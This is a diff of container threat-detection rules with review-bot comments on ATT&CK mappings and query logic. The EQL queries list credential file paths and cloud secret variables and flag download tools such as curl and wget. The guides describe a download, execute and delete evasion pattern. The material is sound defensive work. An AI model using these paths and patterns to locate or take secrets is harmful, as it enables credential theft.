diff --git a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml index c2d8e83ee8d..0e1b024eb19 100644 --- a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml +++ b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] @@ -96,11 +96,6 @@ process where event.type == "start" and event.action == "exec" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml new file mode 100644 index 00000000000..67fbebdda38 --- /dev/null +++ b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml 
@@ -0,0 +1,141 @@ +[metadata] +creation_date = "2023/05/12" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/01/15" + +[rule] +author = ["Elastic"] +description = """ +Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials +and system configurations inside a container. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Sensitive File Compression Detected via Defend for Containers" +note = """## Setup + +## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Sensitive File Compression Detected via Defend for Containers + +Containers are lightweight, portable environments used to run applications consistently across different systems. Adversaries may exploit compression utilities within containers to gather and exfiltrate sensitive files, such as credentials and configuration files. The detection rule identifies suspicious compression activities by monitoring for specific utilities and file paths, flagging potential unauthorized data collection attempts. + +### Possible investigation steps + +- Review the process details to confirm the use of compression utilities such as zip, tar, gzip, hdiutil, or 7z within the container environment, focusing on the process.name and process.args fields. 
+- Examine the specific file paths listed in the process.args to determine if they include sensitive files like SSH keys, AWS credentials, or Docker configurations, which could indicate unauthorized data collection. +- Identify the container.id associated with the alert to gather more context about the container's purpose, owner, and any recent changes or deployments that might explain the activity. +- Check the event.type field for "start" to verify the timing of the process initiation and correlate it with any known legitimate activities or scheduled tasks within the container. +- Investigate the user or service account under which the process was executed to assess whether it has the necessary permissions and if the activity aligns with expected behavior for that account. +- Look for any related alerts or logs that might indicate a broader pattern of suspicious activity within the same container or across other containers in the environment. + +### False positive analysis + +- Routine backup operations may trigger the rule if they involve compressing sensitive files for storage. To handle this, identify and exclude backup processes or scripts that are known and trusted. +- Automated configuration management tools might compress configuration files as part of their normal operation. Exclude these tools by specifying their process names or paths in the exception list. +- Developers or system administrators might compress sensitive files during legitimate troubleshooting or maintenance activities. Establish a process to log and review these activities, and exclude them if they are verified as non-threatening. +- Continuous integration and deployment pipelines could involve compressing configuration files for deployment purposes. Identify these pipelines and exclude their associated processes to prevent false positives. +- Security tools that perform regular audits or scans might compress files for analysis. 
Ensure these tools are recognized and excluded from triggering the rule. + +### Response and remediation + +- Immediately isolate the affected container to prevent further data exfiltration or unauthorized access. This can be done by stopping the container or disconnecting it from the network. +- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure. Focus on the specific file paths identified in the alert. +- Change credentials and keys that may have been compromised, including SSH keys, AWS credentials, and Docker configurations. Ensure that new credentials are distributed securely. +- Review and update access controls and permissions for sensitive files within containers to minimize exposure. Ensure that only necessary processes and users have access to these files. +- Implement monitoring and alerting for similar compression activities in other containers to detect potential threats early. Use the identified process names and arguments as indicators. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected. 
+- Conduct a post-incident review to identify gaps in security controls and update container security policies to prevent recurrence.""" +risk_score = 47 +rule_id = "475b42f0-61fb-4ef0-8a85-597458bfb0a1" +severity = "medium" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + process.name in ("zip", "tar", "gzip", "hdiutil", "7z", "rar", "7zip", "p7zip") or + ( + /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "zip", "/bin/zip", "/usr/bin/zip", "/usr/local/bin/zip", + "tar", "/bin/tar", "/usr/bin/tar", "/usr/local/bin/tar", + "gzip", "/bin/gzip", "/usr/bin/gzip", "/usr/local/bin/gzip", + "hdiutil", "/bin/hdiutil", "/usr/bin/hdiutil", "/usr/local/bin/hdiutil", + "7z", "/bin/7z", "/usr/bin/7z", "/usr/local/bin/7z", + "rar", "/bin/rar", "/usr/bin/rar", "/usr/local/bin/rar", + "7zip", "/bin/7zip", "/usr/bin/7zip", "/usr/local/bin/7zip", + "p7zip", "/bin/p7zip", "/usr/bin/p7zip", "/usr/local/bin/p7zip" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) +) and +process.args like~ ( + "*/root/.ssh/*", "*/home/*/.ssh/*", "*/root/.bash_history*", "*/etc/hosts*", "*/root/.aws/*", "*/home/*/.aws/*", + "*/root/.docker/*", 
"*/home/*/.docker/*", "*/etc/group*", "*/etc/passwd*", "*/etc/shadow*", "*/etc/gshadow*", + "*/.azure/*", "*/var/run/secrets/azure/*", "*/.config/gcloud/*", "*application_default_credentials.json*", + "*type: service_account*", "*client_email*", "*private_key_id*", "*private_key*", "*/var/run/secrets/google/*", + "*GOOGLE_APPLICATION_CREDENTIALS*", "*AZURE_CLIENT_ID*", "*AZURE_TENANT_ID*", "*AZURE_CLIENT_SECRET*", + "*AZURE_FEDERATED_TOKEN_FILE*", "*IDENTITY_ENDPOINT*", "*IDENTITY_HEADER*", "*MSI_ENDPOINT*", "*MSI_SECRET*" +) and process.interactive == true and container.id like "*" +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml index 1a58af92a38..6466f00e4a8 100644 --- a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml 
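Review bot: The `note` opens with an empty `## Setup` heading followed directly by `## Triage and analysis`, so either the setup text is missing or the heading should be removed. The false-positive section lists backup jobs, configuration-management tools and CI/CD pipelines as likely sources, yet the query ends with `process.interactive == true`, so none of those non-interactive paths can fire this rule; the guide should describe interactive false positives (an operator hand-archiving `~/.ssh` or `/etc/passwd` during troubleshooting) or the `interactive` constraint should be revisited. In the `process.args like~` list, `"*private_key*"` already matches everything `"*private_key_id*"` does, and the JSON-content patterns such as `"*type: service_account*"` and `"*client_email*"` will only appear in process arguments in unusual invocations — a short comment saying they are intentional would help. `hdiutil` in the utility list is a macOS tool and cannot match under `host.os.type == "linux"`; harmless, but dead.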
+++ b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -60,7 +60,14 @@ references = ["https://sysdig.com/blog/cve-2021-25741-kubelet-falco/"]
 risk_score = 47
 rule_id = "9661ed8b-001c-40dc-a777-0983b7b0c91a"
 severity = "medium"
-tags = ["Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -112,16 +119,3 @@ reference = "https://attack.mitre.org/techniques/T1552/001/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1083"
-name = "File and Directory Discovery"
-reference = "https://attack.mitre.org/techniques/T1083/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
index 005de67e7ad..1dc98471512 100644
--- a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
+++ b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml
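Review bot: `"Tactic: Discovery"` is dropped from `tags` (and its `T1083` File and Directory Discovery block goes in the next hunk), leaving only Credential Access for a rule whose name describes *searching* for keys and passwords; walking the filesystem for credential material is precisely T1083, so unless the query was narrowed in a way not shown here, keeping both tactics is the more accurate mapping. Separately, the metadata hunk above moves `updated_date` backwards from `2026/03/23` to `2026/01/15` while the rule content changes in this same patch — the same pattern appears in every rule file below — which looks like a rebase artifact; the date should carry the date of this edit.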
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/06"
 
 [rule]
 author = ["Elastic"]
@@ -101,11 +101,6 @@ any where host.os.type == "linux" and process.interactive == true and container.
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
 [[rule.threat.technique]]
 id = "T1552"
 name = "Unsecured Credentials"
diff --git a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
index 3b5a90b50ca..a3e3f977696 100644
--- a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/03/05"
 
 [rule]
 author = ["Elastic"]
@@ -130,35 +130,45 @@ sequence by process.parent.entity_id, container.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] + name = "Obfuscated Files or Information" + id = "T1027" + reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] + name = "Deobfuscate/Decode Files or Information" + id = "T1140" + reference = "https://attack.mitre.org/techniques/T1140/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" + + 
[[rule.threat.technique.subtechnique]] + name = "Malicious File" + id = "T1204.002" + reference = "https://attack.mitre.org/techniques/T1204/002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml new file mode 100644 index 00000000000..5da9a158df8 --- /dev/null +++ b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml 
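Review bot: The rewrite drops the `T1027.010` Command Obfuscation sub-technique while keeping its parent `T1027`, even though a payload decoded on the command line and piped to an interpreter is exactly what that sub-technique describes; unless the removal is intentional, keep the `[[rule.threat.technique.subtechnique]]` entry under T1027. The added `T1204.002` Malicious File describes a user opening a delivered file, which a `sequence by process.parent.entity_id` decode-and-pipe chain does not evidence — `T1059.004` on its own is the defensible Execution mapping. The new sub-tables are indented with `name` before `id`, whereas the rule files added elsewhere in this patch are flat with `id` first; normalising one way avoids two formats in the same directory.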
@@ -0,0 +1,152 @@ +[metadata] +creation_date = "2026/03/05" +integration = ["cloud_defend"] +maturity = "production" +min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" +min_stack_version = "9.3.0" +updated_date = "2026/03/05" + +[rule] +author = ["Elastic"] +description = """ +This rule detects the creation, execution, and deletion of files inside a container, a common +technique used by attackers to evade detection. +""" +from = "now-6m" +index = ["logs-cloud_defend.process*", "logs-cloud_defend.file*"] +interval = "5m" +language = "eql" +license = "Elastic License v2" +name = "Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers" +note = """## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Ingress Tool Transfer Followed by Execution and Deletion Detected via Defend for Containers + +This detection flags a rapid sequence inside a container where a file is written to a common transient or user-writable location, executed, then deleted shortly after—an evasion pattern meant to minimize on-disk artifacts and frustrate forensic review. Attackers often use a shell to pull a payload with common transfer utilities into `/tmp` or shared memory, run it immediately for credential theft or lateral movement, and then remove it to blend back into normal container churn. + +### Possible investigation steps + +- Pivot on the container to review the full process tree and preceding commands around the sequence to determine how the payload was introduced (interactive shell, entrypoint, cron, CI job, or exploited service) and what else executed nearby in time. 
+- Retrieve the file content if still present or recover it from container runtime logs/snapshots/registry layers, then compute hashes and run static/dynamic analysis to identify malware family, network indicators, and persistence or credential-access behavior. +- Review outbound network connections from the container during the same window to identify download sources, callback infrastructure, and any subsequent lateral movement attempts to internal services. +- Check whether the container or pod is running with elevated privileges (host mounts, privileged mode, sensitive service account tokens, or access to Docker/CRI sockets) to assess host-escape risk and scope potential impact beyond the container. +- Validate legitimacy by correlating with recent deploys/build steps and expected package/install activity, and if suspicious, isolate the workload and rotate any exposed secrets or tokens used by the container. + +### False positive analysis + +- A container entrypoint or bootstrap script downloads a small helper or configuration artifact into `/tmp` (or similar), executes it via a shell to perform initialization checks or configuration, and then deletes it immediately to keep the runtime filesystem clean. +- A build/test step running inside a container fetches transient binaries or linkable objects (e.g., via `curl`/`wget`/`scp` or `ld`) into writable paths like `/tmp` or `/opt`, executes them as part of compilation or validation, and removes them as part of routine cleanup. + +### Response and remediation + +- Quarantine the affected pod or container by isolating it from the network and scaling it to zero or killing the container while preserving a copy of the writable layer and runtime logs for forensic analysis. 
+- Identify and block the download and command-and-control endpoints used by the transfer utility (for example the `curl`/`wget` URL or `scp` destination) at egress controls, then search for the same indicator across other workloads and nodes to find additional compromised containers. +- Eradicate by rebuilding and redeploying the workload from a known-good image and clean source, removing any unauthorized startup scripts or injected binaries in paths like `/tmp`, `/dev/shm`, `/var/tmp`, `/root`, or `/opt`. +- Rotate and revoke any credentials the container could access such as Kubernetes service account tokens, API keys, registry credentials, and mounted secrets, and invalidate sessions if the executed payload could have harvested them. +- Escalate to incident response immediately if the workload was privileged, had hostPath mounts or container runtime socket access, touched `/proc/*/fd/*`, or showed signs of data access or lateral movement to internal services. +- Harden by enforcing least privilege and runtime controls such as read-only root filesystems, no shell or download tools in production images, restricted egress allowlists, and admission policies that block privileged pods and sensitive host mounts. 
+""" +references = [ + "https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware", +] +risk_score = 73 +rule_id = "1dc56174-5d02-4ca4-af92-e391f096fb21" +severity = "high" +tags = [ + "Data Source: Elastic Defend for Containers", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "eql" +query = ''' +sequence by container.id, user.id with maxspan=10s + [file where event.action == "creation" and ( + process.name in ("curl", "wget", "fetch", "ftp", "sftp", "scp", "rsync", "ld") or + ( + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and + process.args in ( + "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", + "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", + "fetch", "/bin/fetch", "/usr/bin/fetch", "/usr/local/bin/fetch", + "ftp", "/bin/ftp", "/usr/bin/ftp", "/usr/local/bin/ftp", + "sftp", "/bin/sftp", "/usr/bin/sftp", "/usr/local/bin/sftp", + "scp", "/bin/scp", "/usr/bin/scp", "/usr/local/bin/scp", + "rsync", "/bin/rsync", "/usr/bin/rsync", "/usr/local/bin/rsync", + "ld", "/bin/ld", "/usr/bin/ld", "/usr/local/bin/ld" + ) and + /* default exclusion list to not FP on default multi-process commands */ + not process.args in ( + "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", + "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", + "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", + "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" + ) + ) + ) and file.path like ( + "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", + "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*" + ) + ] by file.name + [process where event.type == "start" and event.action == "exec" and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", 
"busybox") + ] by process.name + [file where event.action == "deletion" and file.path like ( + "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", + "/proc/*/fd/*", "/home/*/*", "/root/*", "/opt/*" + ) and not process.name in ("rm", "ld", "conftest", "link", "gcc", "getarch", "ld") + ] by file.name +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml index 8ac47055373..0538c4cd9c4 100644 --- a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml 
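Review bot: The rule is titled "Ingress Tool Transfer Followed by Execution and Deletion" and its first sequence step matches `curl`/`wget`/`scp`-style transfers, but the `[[rule.threat]]` blocks map only Defense Evasion (`T1070.004`) and Execution (`T1059.004`, `T1204.002`); add a Command and Control block with `T1105` Ingress Tool Transfer, plus the matching `"Tactic: Command and Control"` tag, so the mapping reflects what step one detects. In the deletion step, `not process.name in ("rm", "ld", "conftest", "link", "gcc", "getarch", "ld")` lists `ld` twice and, more importantly, excludes `rm`, so the ordinary `curl … && ./payload && rm payload` cradle is filtered out by the third step; if the intent is to catch only self-deleting payloads, say so in a comment on that line and in `description`, otherwise drop `rm` from the exclusion. `ld` also appears in the transfer-tool list of step one, where it is a linker rather than a download utility — a one-line comment explaining why it is treated as a transfer tool would help the next reader.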
+++ b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/02/10"
 
 [rule]
 author = ["Elastic"]
@@ -75,30 +75,43 @@ process where event.type == "start" and event.action == "exec" and process.inter
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1564"
-name = "Hide Artifacts"
-reference = "https://attack.mitre.org/techniques/T1564/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1564.001"
-name = "Hidden Files and Directories"
-reference = "https://attack.mitre.org/techniques/T1564/001/"
-
 [rule.threat.tactic]
-id = "TA0005"
 name = "Defense Evasion"
+id = "TA0005"
 reference = "https://attack.mitre.org/tactics/TA0005/"
 
+[[rule.threat.technique]]
+name = "Reflective Code Loading"
+id = "T1620"
+reference = "https://attack.mitre.org/techniques/T1620/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1609"
-name = "Container Administration Command"
-reference = "https://attack.mitre.org/techniques/T1609/"
-
 [rule.threat.tactic]
-id = "TA0002"
 name = "Execution"
+id = "TA0002"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+name = "Command and Control"
+id = "TA0011"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat.technique]]
+name = "Application Layer Protocol"
+id = "T1071"
+reference = "https://attack.mitre.org/techniques/T1071/"
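Review bot: Only a date hunk and this threat hunk touch the file, yet the hunk adds a third `[[rule.threat]]` block for Command and Control; every other rule in this patch that gains a tactic also updates `tags` with a matching `"Tactic: …"` entry, so unless this file's tags line already carries `"Tactic: Command and Control"`, tags and threat mapping now disagree. The mapping itself is hard to support from the hunk context — a `process where event.type == "start" and event.action == "exec" and process.inter…` query observes process launches, not the `T1071` Application Layer Protocol traffic it is now mapped to — and `T1620` Reflective Code Loading (replacing `T1564.001` Hidden Files and Directories) describes in-memory execution such as memfd/`/proc/*/fd/*`, which a suspicious-directory match only evidences if those paths are in the query's list, not visible here. Unless the query is extended, keeping T1564.001 and dropping the C2 block is the more honest mapping.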
diff --git a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
index 3de8c254263..f84f1a58ad4 100644
--- a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -66,7 +66,14 @@ references = [
 risk_score = 73
 rule_id = "342f834b-21a6-41bf-878c-87d116eba3ee"
 severity = "high"
-tags = ["Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -92,21 +99,3 @@ reference = "https://attack.mitre.org/techniques/T1574/006/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1574.006"
-name = "Dynamic Linker Hijacking"
-reference = "https://attack.mitre.org/techniques/T1574/006/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
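Review bot: `"Tactic: Persistence"` is removed from `tags` (with the matching `[[rule.threat]]` block deleted in the next hunk), leaving only Defense Evasion for a rule whose retained mapping is `T1574.006` Dynamic Linker Hijacking; ATT&CK files Hijack Execution Flow under Persistence, Privilege Escalation and Defense Evasion, and modifying a preloaded shared object, as this rule's name describes, is primarily a way to survive across process launches, so the Persistence tactic looks worth keeping. If it is dropped on purpose, a short rationale in the commit message or a comment above the remaining `[rule.threat.tactic]` would save the next reviewer from re-adding it.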
diff --git a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
index 0632be00b6b..4168f4a7137 100644
--- a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
+++ b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2026/03/05"
 
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,15 @@ references = [
 risk_score = 47
 rule_id = "227cf26a-88d1-4bcb-bf4c-925e5875abcf"
 severity = "medium"
-tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Data Source: Elastic Defend for Containers",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -74,6 +82,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
+
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
@@ -83,3 +96,31 @@ reference = "https://attack.mitre.org/techniques/T1140/"
 id = "TA0005"
 name = "Defense Evasion"
